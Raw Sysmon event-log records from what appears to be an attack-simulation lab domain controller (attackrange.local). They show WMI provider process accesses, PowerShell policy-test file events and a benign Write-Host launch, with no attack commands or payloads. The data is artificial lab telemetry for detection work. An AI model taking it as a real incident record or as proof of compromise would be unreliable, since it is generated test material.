16:54:03.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240178Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240177Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240176Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240175Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002240174Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.185{05ADC7E1-6DAB-603E-B5AA-00000000AD01}14692ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_rinedyly.vbl.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240173Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240172Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002240171Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.185{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=973CFB7E228D978AF06AF8B7991F2EF2,SHA256=E885534161C400FE1008EB391CF84640652DED9640E959B521F23FA404A3BC06,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240170Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240169Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240168Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002240167Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.175{05ADC7E1-6DAB-603E-B5AA-00000000AD01}14692ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ggcfnc1g.th1.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240166Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240165Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.175{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6DAB-603E-B8AA-00000000AD01}12596C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002240164Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.173{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6DAB-603E-B7AA-00000000AD01}9900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002240163Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.154{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240162Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.154{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240161Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.154{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240160Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.154{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240159Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.154{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6DAB-603E-B7AA-00000000AD01}9900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002240158Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-B7AA-00000000AD01}9900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002240157Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.167{05ADC7E1-6DAB-603E-B7AA-00000000AD01}9900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -NoProfile -Com Write-Host 29754ac8-ef81-40fb-b873-c36efb893194C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x80000000000000002240156Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.154{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6DAA-603E-B2AA-00000000AD01}14436C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240155Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.154{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DAA-603E-B2AA-00000000AD01}14436C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000002240154Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.154{05ADC7E1-6DAB-603E-B5AA-00000000AD01}14692C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ggcfnc1g.th1.ps12021-03-02 16:54:03.154 10341000x80000000000000002240153Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-B6AA-00000000AD01}13356C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51